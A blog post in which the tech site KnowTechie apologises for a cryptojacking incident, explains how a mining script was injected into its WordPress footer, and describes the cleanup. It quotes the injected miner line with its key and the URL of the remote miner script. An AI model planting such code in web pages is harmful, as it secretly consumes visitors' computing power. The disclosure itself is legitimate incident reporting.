KnowTechie was breached by bitcoin bandits
The good news is that KnowTechie is no longer secretly mining bitcoin off its users and the whole overall experience should be improved now with our newly placed security features.
We got hacked, well, sort of.
I don’t know how it happened, but we found out that for the past couple of weeks, KnowTechie has been secretly mining bitcoin off our visitors. If you visited our website in that time, you might have noticed your computer running at its highest capacity. You may have noticed our site ran extremely slow or just thought it was your computer freezing up again. This was not the case, and for that, we are truly sorry.
To be clear, we didn’t implement this on the site. We did not profit in anyway here. Instead, a malicious line of code was injected onto KnowTechie which ran a script cleverly hidden in our footer file. With the script enabled, this basically uses up a user computer’s processing power to figure out complicated math equations to confirm new transactions on the blockchain while producing new bitcoin. It’s complex, I know, but the gist of it is that someone was profiting from all this, but unfortunately that someone was not us. If it had been, you know Jonathan would have written a review of a new jet-ski bitching how it didn’t have an adequate sized cup-holder.
It’s crazy, but this is happening to a lot of websites. Just recently, CBS’s Showtime was caught mining crypto-coins in viewers’ web browsers, a ‘Free’ Starbucks Wi-Fi network was caught mining for bitcoin, and just recently, researchers from a security firm noted that at least 500 websites running WordPress had been hacked running a CoinHive mining script–which is what we suspect happened to us.
Here’s a similar experience that Politifact.com just went through as reported by ArsTechnica:
Earlier this month, political fact-checking site Politifact.com was found hosting Coinhive scripts in a way that exhausted 100 percent of visitors computing resources. A PolitiFact official told Ars the incident occurred when “an unidentified hacker attached a crypto mining script to the PolitiFact code base being stored on a cloud-based server.” The code has since been removed and was active only when people had a politifact.com window open in their browser.
This further solidifies our thoughts as to what happened to us, and it appears they were using a similar architecture to CoinHive.
How I discovered it
For the past couple of weeks, I noticed that the site was running really slow, and anytime I had any windows up from KnowTechie, my computer also crawled at a slow pace. I figured it was probably a bunch of junk files on my Mac that needed to be cleaned up so I used my usual cleanup apps to clear everything out. Sometimes that worked, and I would eventually forget about it.
Fast forward a couple of weeks of later, and I’m running into the same issues again. I was convinced there was something wrong with my site. I found a couple of helpful articles that showed you if your computer was indeed secretly mining cryptocurrencies, and for the most part, they helped, but I still couldn’t verify if this was something on my computer or the site. Thankfully, a mod over at TechSpy and N4G confirmed a script that we found running in the footer.
Here’s the actual script:
var miner=new Client.Anonymous('9b23351e 1f3f32e93028300c5d1c4c5a6ab2f10 329e4e7093614fdced0163ca2') ;miner.start();
The script then leads you here: https://www.hashing.win/scripts/min.js, which looks like this:
How I fixed it, well, kind of
Now, I’m not a web developer by any stretch, but I do know my way around WordPress fairly well. But it when it came to this, I really had no idea how to fix it. I tried contacting my hosting provider to see if it was something server related, but they verified that wasn’t the case and the injection was made on the database side. Meaning, they couldn’t fix it, and it was up to me to figure this out. They did, however, refer me to a security firm who could help.
Remember the security firm I mentioned earlier that said 500 WordPress sites were hacked to mine bitcoin, well, their name is Sucuri, and they were able to clean up our mess in just about 12-hours. Sure, I could have just removed the script manually from my footer, but what’s that to stop the same hacker or another from doing this again? Honestly, we wouldn’t take that chance at exploiting our viewers, unknowingly – you know, again. I needed something to protect us further down the line, and so I did what I had to do: I coughed up $299 for their annual service which gave me an immediate response to our mining issue, plus a whole lot of other goodies which you can find here.
I don’t want this to sound like a ringing endorsement for Sucuri, but I have to give credit where it’s due because they totally did their job and then some. But seriously, after this whole ordeal, it really put into perspective that any site is susceptible to this. Whether its a massive site like Yahoo or an independent blog like KnowTechie, it can happen, and if you don’t keep a vigilant eye out, it can cost you an audience. I hope this wasn’t this case with our experience.
The good news is that KnowTechie is no longer secretly mining bitcoin off its users and the whole overall experience should be improved now with our newly placed security features. Again, I want to close with how sorry we all are here at KnowTechie about any inconvenience this may have caused you, and more importantly, your computers. Furthermore, you have our continued promise to do everything we can to keep our site secure as well as keep the connections of our readers free from any unexpected hijinks.